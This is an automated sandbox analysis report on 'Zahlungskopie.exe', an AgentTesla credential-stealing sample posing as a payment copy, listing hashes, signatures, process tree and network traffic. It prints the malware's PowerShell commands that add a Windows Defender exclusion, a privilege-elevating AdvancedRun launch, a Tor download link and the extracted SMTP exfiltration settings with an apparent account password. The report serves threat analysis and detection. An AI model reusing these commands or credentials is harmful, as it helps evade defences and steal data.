Analysis Report Zahlungskopie.exe

Overview

General Information

Sample Name: Zahlungskopie.exe
Analysis ID: 361303
MD5: 9615a1c5bc0707a4248b1f138b834c2e
SHA1: ff9de956805883e95f6c2e17690ed64093875f74
SHA256: 09ed9ccee27444a684fb38f7137ab2328963596a5e679acee296210e0c1c15a1
Tags: AgentTesla, DEU, exe, geo, MailChannels

Detection

AgentTesla
Score: 80
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Yara detected AgentTesla
Adds a directory exclusion to Windows Defender
Binary contains a suspicious time stamp
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Antivirus or Machine Learning detection for unpacked file
Contains capabilities to detect virtual machines
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to dynamically determine API calls
Contains functionality to launch a program with higher privileges
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Detected potential crypto function
Drops PE files
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found potential string decryption / allocating functions
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE / OLE file has an invalid certificate
PE file contains strange resources
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected Credential Stealer

Startup

  • System is w10x64
  • Zahlungskopie.exe (PID: 984 cmdline: 'C:\Users\user\Desktop\Zahlungskopie.exe' MD5: 9615A1C5BC0707A4248B1F138B834C2E)
    • AdvancedRun.exe (PID: 6584 cmdline: 'C:\Users\user\AppData\Local\Temp\8f5d8ea2-6047-4797-be42-69846e079291\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\8f5d8ea2-6047-4797-be42-69846e079291\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run MD5: 17FC12902F4769AF3A9271EB4E2DACCE)
      • AdvancedRun.exe (PID: 6712 cmdline: 'C:\Users\user\AppData\Local\Temp\8f5d8ea2-6047-4797-be42-69846e079291\AdvancedRun.exe' /SpecialRun 4101d8 6584 MD5: 17FC12902F4769AF3A9271EB4E2DACCE)
    • powershell.exe (PID: 6856 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\Zahlungskopie.exe' -Force MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 6868 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • powershell.exe (PID: 6884 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\Zahlungskopie.exe' -Force MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 6936 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • Zahlungskopie.exe (PID: 5780 cmdline: C:\Users\user\Desktop\Zahlungskopie.exe MD5: 9615A1C5BC0707A4248B1F138B834C2E)
    • Zahlungskopie.exe (PID: 3660 cmdline: C:\Users\user\Desktop\Zahlungskopie.exe MD5: 9615A1C5BC0707A4248B1F138B834C2E)
    • Zahlungskopie.exe (PID: 6448 cmdline: C:\Users\user\Desktop\Zahlungskopie.exe MD5: 9615A1C5BC0707A4248B1F138B834C2E)
  • cleanup

Malware Configuration

Threatname: Agenttesla

{"Exfil Mode": "SMTP", "SMTP Info": "info.network@greatdeck.coGreatd@2018$!mail.greatdeck.co"}

Yara Overview

Memory Dumps

Source | Rule | Description | Author | Strings
00000012.00000002.913027538.0000000000402000.00000040.00000001.sdmp | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security |
00000012.00000002.915293873.0000000002CC1000.00000004.00000001.sdmp | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security |
00000012.00000002.915293873.0000000002CC1000.00000004.00000001.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |
Process Memory Space: Zahlungskopie.exe PID: 6448 | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security |
Process Memory Space: Zahlungskopie.exe PID: 6448 | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |

Unpacked PEs

Source | Rule | Description | Author | Strings
18.2.Zahlungskopie.exe.400000.0.unpack | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security |

Sigma Overview

No Sigma rule has matched

Signature Overview

AV Detection:

Found malware configuration
Source: 18.2.Zahlungskopie.exe.400000.0.unpack | Malware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "SMTP Info": "info.network@greatdeck.coGreatd@2018$!mail.greatdeck.co"}
Multi AV Scanner detection for submitted file
Source: Zahlungskopie.exe | ReversingLabs: Detection: 29%
Source: 18.2.Zahlungskopie.exe.400000.0.unpack | Avira: Label: TR/Spy.Gen8

Compliance:

Uses insecure TLS / SSL version for HTTPS connection
Source: unknown | HTTPS traffic detected: 99.86.159.34:443 -> 192.168.2.4:49734 version: TLS 1.0
Contains modern PE file flags such as dynamic base (ASLR) or NX
Source: Zahlungskopie.exe | Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Binary contains paths to debug symbols
Source: Binary string: c:\Projects\VS2005\AdvancedRun\Release\AdvancedRun.pdb source: Zahlungskopie.exe, 00000000.00000002.738784790.0000000003F01000.00000004.00000001.sdmp, AdvancedRun.exe, 00000007.00000002.696575204.000000000040C000.00000002.00020000.sdmp, AdvancedRun.exe, 00000009.00000000.695170028.000000000040C000.00000002.00020000.sdmp, AdvancedRun.exe.0.dr
Source: Joe Sandbox View | IP Address: 151.101.2.133
Source: Joe Sandbox View | JA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
Source: unknown | HTTPS traffic detected: 99.86.159.34:443 -> 192.168.2.4:49734 version: TLS 1.0
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 User-Agent: Other Host: www.chelseafc.com Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /base/83650593F542427F159D29BCCFD755F9.html HTTP/1.1 User-Agent: Other Host: 0k10dk21kkeok2e.online Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /base/0A48866E716B370203D6A936495BDF28.html HTTP/1.1 User-Agent: Other Host: 0k10dk21kkeok2e.online
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 User-Agent: Other Host: www.liverpoolfc.com Connection: Keep-Alive
Source: unknown | DNS traffic detected: queries for: www.chelseafc.com
              Source: Zahlungskopie.exe, 00000000.00000002.738784790.0000000003F01000.00000004.00000001.sdmpString found in binary or memory: https://faq.liverpoolfc.com/portal/home
              Source: Zahlungskopie.exe, 00000000.00000002.732446576.0000000002F62000.00000004.00000001.sdmpString found in binary or memory: https://fonts.googleapis.com/css?family=Oswald:400
              Source: powershell.exe, 0000000B.00000003.812678409.000000000562E000.00000004.00000001.sdmp, powershell.exe, 0000000D.00000003.819057899.0000000004FFF000.00000004.00000001.sdmpString found in binary or memory: https://go.micro
              Source: Zahlungskopie.exe, 00000000.00000002.732446576.0000000002F62000.00000004.00000001.sdmpString found in binary or memory: https://instagram.com/realmadrid
              Source: Zahlungskopie.exe, 00000000.00000002.732446576.0000000002F62000.00000004.00000001.sdmpString found in binary or memory: https://iugis.com/uk/home/
              Source: Zahlungskopie.exe, 00000000.00000002.732446576.0000000002F62000.00000004.00000001.sdmpString found in binary or memory: https://matchcentre.liverpoolfc.com?utm_medium=site-link-liverpoolfc.com&amp;utm_source=home-top-nav
              Source: Zahlungskopie.exe, 00000000.00000002.732446576.0000000002F62000.00000004.00000001.sdmpString found in binary or memory: https://mg.co.uk/
              Source: Zahlungskopie.exe, 00000000.00000002.732446576.0000000002F62000.00000004.00000001.sdmpString found in binary or memory: https://nesn.com/liverpool-fc/
              Source: Zahlungskopie.exe, 00000000.00000002.732446576.0000000002F62000.00000004.00000001.sdmpString found in binary or memory: https://plus.google.com/
              Source: Zahlungskopie.exe, 00000000.00000002.732446576.0000000002F62000.00000004.00000001.sdmpString found in binary or memory: https://pubads.g.doubleclick.net/gampad/ads?sz=640x480&iu=/
              Source: Zahlungskopie.exe, 00000000.00000002.732446576.0000000002F62000.00000004.00000001.sdmpString found in binary or memory: https://reachsportshop.com/team/liverpool/
              Source: Zahlungskopie.exe, 00000000.00000002.732446576.0000000002F62000.00000004.00000001.sdmpString found in binary or memory: https://schema.org/Organization
              Source: Zahlungskopie.exe, 00000000.00000002.732446576.0000000002F62000.00000004.00000001.sdmpString found in binary or memory: https://sdk.privacy-center.org/loader.js
              Source: Zahlungskopie.exe, 00000000.00000002.738784790.0000000003F01000.00000004.00000001.sdmp, AdvancedRun.exe.0.drString found in binary or memory: https://sectigo.com/CPS0C
              Source: Zahlungskopie.exe, 00000000.00000002.738784790.0000000003F01000.00000004.00000001.sdmp, AdvancedRun.exe.0.drString found in binary or memory: https://sectigo.com/CPS0D
              Source: Zahlungskopie.exe, 00000000.00000002.738784790.0000000003F01000.00000004.00000001.sdmpString found in binary or memory: https://secure.widget.cloud.opta.net/v3/v3.opta-widgets.js
              Source: Zahlungskopie.exe, 00000000.00000002.732446576.0000000002F62000.00000004.00000001.sdmpString found in binary or memory: https://tribus-watches.com/
              Source: Zahlungskopie.exe, 00000000.00000002.732446576.0000000002F62000.00000004.00000001.sdmpString found in binary or memory: https://twitter.com/ManUtd
              Source: Zahlungskopie.exe, 00000000.00000002.732446576.0000000002F62000.00000004.00000001.sdmpString found in binary or memory: https://uk.joiebaby.com/liverpoolfc/
              Source: Zahlungskopie.exe, 00000000.00000002.732446576.0000000002F62000.00000004.00000001.sdmpString found in binary or memory: https://uk.tigerwit.com/about/liverpool
              Source: Zahlungskopie.exe, 00000000.00000002.732446576.0000000002F62000.00000004.00000001.sdmpString found in binary or memory: https://www.acronis.com/en-gb/
              Source: Zahlungskopie.exe, 00000000.00000002.732446576.0000000002F62000.00000004.00000001.sdmpString found in binary or memory: https://www.axa.com/?utm_source=liverpoolfc&amp;utm_medium=logo-partnership&amp;utm_campaign=lfc1819
              Source: Zahlungskopie.exe, 00000000.00000002.732290944.0000000002F36000.00000004.00000001.sdmpString found in binary or memory: https://www.chelseafc.com
              Source: Zahlungskopie.exeString found in binary or memory: https://www.digicert.com/CPS0
              Source: Zahlungskopie.exe, 00000000.00000002.732446576.0000000002F62000.00000004.00000001.sdmpString found in binary or memory: https://www.easports.com/
              Source: Zahlungskopie.exe, 00000000.00000002.732446576.0000000002F62000.00000004.00000001.sdmpString found in binary or memory: https://www.expedia.co.uk/
              Source: Zahlungskopie.exe, 00000000.00000002.732446576.0000000002F62000.00000004.00000001.sdmpString found in binary or memory: https://www.googletagmanager.com/ns.html?id=GTM-M54566
              Source: Zahlungskopie.exe, 00000000.00000002.732446576.0000000002F62000.00000004.00000001.sdmpString found in binary or memory: https://www.hollyfrontier.com/home/default.aspx
              Source: Zahlungskopie.exe, 00000000.00000002.732446576.0000000002F62000.00000004.00000001.sdmpString found in binary or memory: https://www.levi.com/GB/en_GB/
              Source: Zahlungskopie.exe, 00000000.00000002.732446576.0000000002F62000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpoolfc.com
              Source: Zahlungskopie.exe, 00000000.00000002.732325527.0000000002F49000.00000004.00000001.sdmp, Zahlungskopie.exe, 00000000.00000002.732446576.0000000002F62000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpoolfc.com/
              Source: Zahlungskopie.exe, 00000000.00000002.732446576.0000000002F62000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpoolfc.com/match
              Source: Zahlungskopie.exe, 00000000.00000002.732446576.0000000002F62000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpoolfc.com/match/2020-21/all/fixtures-and-results
              Source: Zahlungskopie.exe, 00000000.00000002.732446576.0000000002F62000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpoolfc.com/match/2020-21/champions-league
              Source: Zahlungskopie.exe, 00000000.00000002.732446576.0000000002F62000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpoolfc.com/match/2020-21/first-team/fixtures-and-results
              Source: Zahlungskopie.exe, 00000000.00000002.732446576.0000000002F62000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpoolfc.com/match/2020-21/premier-league-calendar
              Source: Zahlungskopie.exe, 00000000.00000002.732446576.0000000002F62000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpoolfc.com/match/2020-21/premier-league-table
              Source: Zahlungskopie.exe, 00000000.00000002.732446576.0000000002F62000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpoolfc.com/match/2020-21/u18s/fixtures-and-results
              Source: Zahlungskopie.exe, 00000000.00000002.732446576.0000000002F62000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpoolfc.com/match/2020-21/u23s/fixtures-and-results
              Source: Zahlungskopie.exe, 00000000.00000002.732446576.0000000002F62000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpoolfc.com/match/2020-21/women/fixtures-and-results
              Source: Zahlungskopie.exe, 00000000.00000002.732446576.0000000002F62000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpoolfc.com/match/opta-stats/team-stats
              Source: Zahlungskopie.exe, 00000000.00000002.732446576.0000000002F62000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpoolfc.com/news
              Source: Zahlungskopie.exe, 00000000.00000002.732446576.0000000002F62000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpoolfc.com/news/academy
              Source: Zahlungskopie.exe, 00000000.00000002.732446576.0000000002F62000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpoolfc.com/news/announcements
              Source: Zahlungskopie.exe, 00000000.00000002.732446576.0000000002F62000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpoolfc.com/news/axa-training-centre
              Source: Zahlungskopie.exe, 00000000.00000002.732446576.0000000002F62000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpoolfc.com/news/community
              Source: Zahlungskopie.exe, 00000000.00000002.732446576.0000000002F62000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpoolfc.com/news/first-team
              Source: Zahlungskopie.exe, 00000000.00000002.732446576.0000000002F62000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpoolfc.com/news/media-watch
              Source: Zahlungskopie.exe, 00000000.00000002.732446576.0000000002F62000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpoolfc.com/news/tickets
              Source: Zahlungskopie.exe, 00000000.00000002.732446576.0000000002F62000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpoolfc.com/news/women
              Source: Zahlungskopie.exe, 00000000.00000002.732446576.0000000002F62000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpoolfc.com/scripts/logout.php
              Source: Zahlungskopie.exe, 00000000.00000002.732446576.0000000002F62000.00000004.00000001.sdmpString found in binary or memory: https://www.mancity.com
              Source: Zahlungskopie.exe, 00000000.00000002.732325527.0000000002F49000.00000004.00000001.sdmp, Zahlungskopie.exe, 00000000.00000002.732446576.0000000002F62000.00000004.00000001.sdmpString found in binary or memory: https://www.mancity.com/base/qDRJjWQmMciVzZexKqxHvQNCUcCUOevUqtCcibaOeqaXQSxokmSbdsVNdhpUn.html
              Source: Zahlungskopie.exe, 00000000.00000002.732290944.0000000002F36000.00000004.00000001.sdmpString found in binary or memory: https://www.manutd.com/
              Source: Zahlungskopie.exe, 00000000.00000002.732290944.0000000002F36000.00000004.00000001.sdmpString found in binary or memory: https://www.manutd.com/en
              Source: Zahlungskopie.exe, 00000000.00000002.732446576.0000000002F62000.00000004.00000001.sdmpString found in binary or memory: https://www.manutd.com/en/Help/Accessibility
              Source: Zahlungskopie.exe, 00000000.00000002.732446576.0000000002F62000.00000004.00000001.sdmpString found in binary or memory: https://www.manutd.com/en/Help/Privacy-Policy
              Source: Zahlungskopie.exe, 00000000.00000002.732446576.0000000002F62000.00000004.00000001.sdmpString found in binary or memory: https://www.manutd.com/en/Partners/Global/Visit-Malta
              Source: Zahlungskopie.exe, 00000000.00000002.732446576.0000000002F62000.00000004.00000001.sdmpString found in binary or memory: https://www.manutd.com/en/help/club-contacts?int_source=manutd.com&amp;int_medium=menu&amp;int_campa
              Source: Zahlungskopie.exe, 00000000.00000002.732446576.0000000002F62000.00000004.00000001.sdmpString found in binary or memory: https://www.manutd.com/en/partners/global/marriott-hotels
              Source: Zahlungskopie.exe, 00000000.00000002.732446576.0000000002F62000.00000004.00000001.sdmpString found in binary or memory: https://www.manutd.com/en/partners/global/swissquote
              Source: Zahlungskopie.exe, 00000000.00000002.732290944.0000000002F36000.00000004.00000001.sdmpString found in binary or memory: https://www.manutd.com4
              Source: Zahlungskopie.exe, 00000000.00000002.732446576.0000000002F62000.00000004.00000001.sdmpString found in binary or memory: https://www.mitel.com/learn/case-studies/liverpool-football-club
              Source: Zahlungskopie.exe, 00000000.00000002.732446576.0000000002F62000.00000004.00000001.sdmpString found in binary or memory: https://www.mondelezinternational.com/
              Source: Zahlungskopie.exe, 00000000.00000002.732446576.0000000002F62000.00000004.00000001.sdmpString found in binary or memory: https://www.nike.com/gb/
              Source: Zahlungskopie.exe, 00000000.00000002.732446576.0000000002F62000.00000004.00000001.sdmpString found in binary or memory: https://www.quorn.com/
              Source: Zahlungskopie.exe, 00000000.00000002.732446576.0000000002F62000.00000004.00000001.sdmpString found in binary or memory: https://www.realmadrid.com
              Source: Zahlungskopie.exe, 00000000.00000002.732325527.0000000002F49000.00000004.00000001.sdmp, Zahlungskopie.exe, 00000000.00000002.732446576.0000000002F62000.00000004.00000001.sdmpString found in binary or memory: https://www.realmadrid.com/base/qDRJjWQmMciVzZexKqxHvQNCUcCUOevUqtCcibaOeqaXQSxokmSbdsVNdhpUn.html
              Source: Zahlungskopie.exe, 00000000.00000002.732446576.0000000002F62000.00000004.00000001.sdmpString found in binary or memory: https://www.snapchat.com/
              Source: Zahlungskopie.exe, 00000012.00000002.913027538.0000000000402000.00000040.00000001.sdmpString found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip
              Source: Zahlungskopie.exe, 00000012.00000002.915293873.0000000002CC1000.00000004.00000001.sdmpString found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha
              Source: Zahlungskopie.exe, 00000000.00000002.732446576.0000000002F62000.00000004.00000001.sdmpString found in binary or memory: https://www.tiktok.com/
              Source: Zahlungskopie.exe, 00000000.00000002.732446576.0000000002F62000.00000004.00000001.sdmpString found in binary or memory: https://www.tourism-mauritius.mu
              Source: Zahlungskopie.exe, 00000000.00000002.732446576.0000000002F62000.00000004.00000001.sdmpString found in binary or memory: https://www.twitter.com/realmadrid
              Source: Zahlungskopie.exe, 00000000.00000002.732446576.0000000002F62000.00000004.00000001.sdmpString found in binary or memory: https://www.youtube.com/manutd
              Source: Zahlungskopie.exe, 00000000.00000002.732446576.0000000002F62000.00000004.00000001.sdmpString found in binary or memory: https://www.youtube.com/realmadrid
              Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49720
              Source: unknownNetwork traffic detected: HTTP traffic on port 49720 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
              Source: C:\Users\user\Desktop\Zahlungskopie.exeWindow created: window name: CLIPBRDWNDCLASS
              Source: C:\Users\user\Desktop\Zahlungskopie.exeCode function: 0_2_015DB2940_2_015DB294
              Source: C:\Users\user\Desktop\Zahlungskopie.exeCode function: 0_2_015DDB400_2_015DDB40
              Source: C:\Users\user\Desktop\Zahlungskopie.exeCode function: 0_2_015DDB300_2_015DDB30
              Source: C:\Users\user\Desktop\Zahlungskopie.exeCode function: 18_2_02B946A018_2_02B946A0
              Source: C:\Users\user\Desktop\Zahlungskopie.exeCode function: 18_2_02B93D5018_2_02B93D50
              Source: C:\Users\user\Desktop\Zahlungskopie.exeCode function: 18_2_02B9469018_2_02B94690
              Source: C:\Users\user\Desktop\Zahlungskopie.exeCode function: 18_2_02B9461018_2_02B94610
              Source: C:\Users\user\Desktop\Zahlungskopie.exeCode function: 18_2_02B9DA0118_2_02B9DA01
              Source: C:\Users\user\Desktop\Zahlungskopie.exeCode function: 18_2_05ED754018_2_05ED7540
              Source: C:\Users\user\Desktop\Zahlungskopie.exeCode function: 18_2_05ED94F818_2_05ED94F8
              Source: C:\Users\user\Desktop\Zahlungskopie.exeCode function: 18_2_05ED6C7018_2_05ED6C70
              Source: C:\Users\user\AppData\Local\Temp\8f5d8ea2-6047-4797-be42-69846e079291\AdvancedRun.exeCode function: String function: 0040B550 appears 50 times
              Source: Zahlungskopie.exeStatic PE information: invalid certificate
              Source: AdvancedRun.exe.0.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
              Source: AdvancedRun.exe.0.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
              Source: Zahlungskopie.exeBinary or memory string: OriginalFilename vs Zahlungskopie.exe
              Source: Zahlungskopie.exe, 00000000.00000002.738784790.0000000003F01000.00000004.00000001.sdmpBinary or memory string: ,@shell32.dllSHGetSpecialFolderPathWshlwapi.dllSHAutoComplete%2.2X%2.2X%2.2X&lt;&gt;&quot;&deg;&amp;<br><font size="%d" color="#%s"><b></b>\StringFileInfo\\VarFileInfo\Translation%4.4X%4.4X040904E4ProductNameFileDescriptionFileVersionProductVersionCompanyNameInternalNameLegalCopyrightOriginalFileNameRSDSu vs Zahlungskopie.exe
              Source: Zahlungskopie.exe, 00000000.00000002.738784790.0000000003F01000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameAdvancedRun.exe8 vs Zahlungskopie.exe
              Source: Zahlungskopie.exe, 00000000.00000002.756274418.0000000004901000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameSHIT.dll* vs Zahlungskopie.exe
              Source: Zahlungskopie.exe, 00000000.00000002.729882875.0000000000BB2000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameCheckValidity.exe< vs Zahlungskopie.exe
              Source: Zahlungskopie.exeBinary or memory string: OriginalFilename vs Zahlungskopie.exe
              Source: Zahlungskopie.exe, 00000010.00000000.721944485.0000000000202000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameCheckValidity.exe< vs Zahlungskopie.exe
              Source: Zahlungskopie.exeBinary or memory string: OriginalFilename vs Zahlungskopie.exe
              Source: Zahlungskopie.exe, 00000011.00000000.723484920.00000000001E2000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameCheckValidity.exe< vs Zahlungskopie.exe
              Source: Zahlungskopie.exeBinary or memory string: OriginalFilename vs Zahlungskopie.exe
              Source: Zahlungskopie.exe, 00000012.00000000.725239793.0000000000832000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameCheckValidity.exe< vs Zahlungskopie.exe
              Source: Zahlungskopie.exe, 00000012.00000002.913027538.0000000000402000.00000040.00000001.sdmpBinary or memory string: OriginalFilenameSjSc VDH.exe2 vs Zahlungskopie.exe
              Source: Zahlungskopie.exe, 00000012.00000002.914226982.0000000000F5A000.00000004.00000020.sdmpBinary or memory string: OriginalFilenameclr.dllT vs Zahlungskopie.exe
              Source: Zahlungskopie.exeBinary or memory string: OriginalFilenameCheckValidity.exe< vs Zahlungskopie.exe
              Source: classification engineClassification label: mal80.troj.evad.winEXE@17/16@21/5
              Source: C:\Users\user\AppData\Local\Temp\8f5d8ea2-6047-4797-be42-69846e079291\AdvancedRun.exeCode function: 7_2_00408FC9 GetCurrentProcess,GetLastError,GetProcAddress,GetProcAddress,LookupPrivilegeValueW,GetProcAddress,AdjustTokenPrivileges,GetLastError,FindCloseChangeNotification,7_2_00408FC9
              Source: C:\Users\user\AppData\Local\Temp\8f5d8ea2-6047-4797-be42-69846e079291\AdvancedRun.exeCode function: 9_2_00408FC9 GetCurrentProcess,GetLastError,GetProcAddress,GetProcAddress,LookupPrivilegeValueW,GetProcAddress,AdjustTokenPrivileges,GetLastError,FindCloseChangeNotification,9_2_00408FC9
              Source: C:\Users\user\AppData\Local\Temp\8f5d8ea2-6047-4797-be42-69846e079291\AdvancedRun.exeCode function: 7_2_004095FD CreateToolhelp32Snapshot,memset,Process32FirstW,OpenProcess,OpenProcess,OpenProcess,memset,GetModuleHandleW,GetProcAddress,QueryFullProcessImageNameW,CloseHandle,Process32NextW,CloseHandle,7_2_004095FD
              Source: C:\Users\user\AppData\Local\Temp\8f5d8ea2-6047-4797-be42-69846e079291\AdvancedRun.exeCode function: 7_2_0040A33B FindResourceW,SizeofResource,LoadResource,LockResource,7_2_0040A33B
              Source: C:\Users\user\AppData\Local\Temp\8f5d8ea2-6047-4797-be42-69846e079291\AdvancedRun.exeCode function: 7_2_00401306 OpenServiceW,CloseServiceHandle,QueryServiceStatus,StartServiceW,CloseServiceHandle,CloseServiceHandle,7_2_00401306
              Source: C:\Users\user\Desktop\Zahlungskopie.exeFile created: C:\Users\user\AppData\Local\EyZTsSvYLRhPfexadI
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6868:120:WilError_01
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6936:120:WilError_01
              Source: C:\Users\user\Desktop\Zahlungskopie.exeFile created: C:\Users\user\AppData\Local\Temp\8f5d8ea2-6047-4797-be42-69846e079291
              Source: Zahlungskopie.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
              Source: C:\Users\user\Desktop\Zahlungskopie.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
              Source: C:\Users\user\Desktop\Zahlungskopie.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
              Source: C:\Users\user\Desktop\Zahlungskopie.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
              Source: C:\Users\user\Desktop\Zahlungskopie.exeFile read: C:\Users\user\Desktop\desktop.ini
              Source: C:\Users\user\Desktop\Zahlungskopie.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
              Source: C:\Users\user\Desktop\Zahlungskopie.exeFile read: C:\Windows\System32\drivers\etc\hosts
              Source: C:\Users\user\Desktop\Zahlungskopie.exeFile read: C:\Windows\System32\drivers\etc\hosts
              Source: C:\Users\user\Desktop\Zahlungskopie.exeFile read: C:\Windows\System32\drivers\etc\hosts
              Source: C:\Users\user\Desktop\Zahlungskopie.exeFile read: C:\Windows\System32\drivers\etc\hosts
              Source: Zahlungskopie.exeReversingLabs: Detection: 29%
              Source: C:\Users\user\Desktop\Zahlungskopie.exeFile read: C:\Users\user\Desktop\Zahlungskopie.exe:Zone.Identifier
              Source: unknownProcess created: C:\Users\user\Desktop\Zahlungskopie.exe 'C:\Users\user\Desktop\Zahlungskopie.exe'
              Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\8f5d8ea2-6047-4797-be42-69846e079291\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\8f5d8ea2-6047-4797-be42-69846e079291\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\8f5d8ea2-6047-4797-be42-69846e079291\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run
              Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\8f5d8ea2-6047-4797-be42-69846e079291\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\8f5d8ea2-6047-4797-be42-69846e079291\AdvancedRun.exe' /SpecialRun 4101d8 6584
              Source: unknownProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\Zahlungskopie.exe' -Force
              Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: unknownProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\Zahlungskopie.exe' -Force
              Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
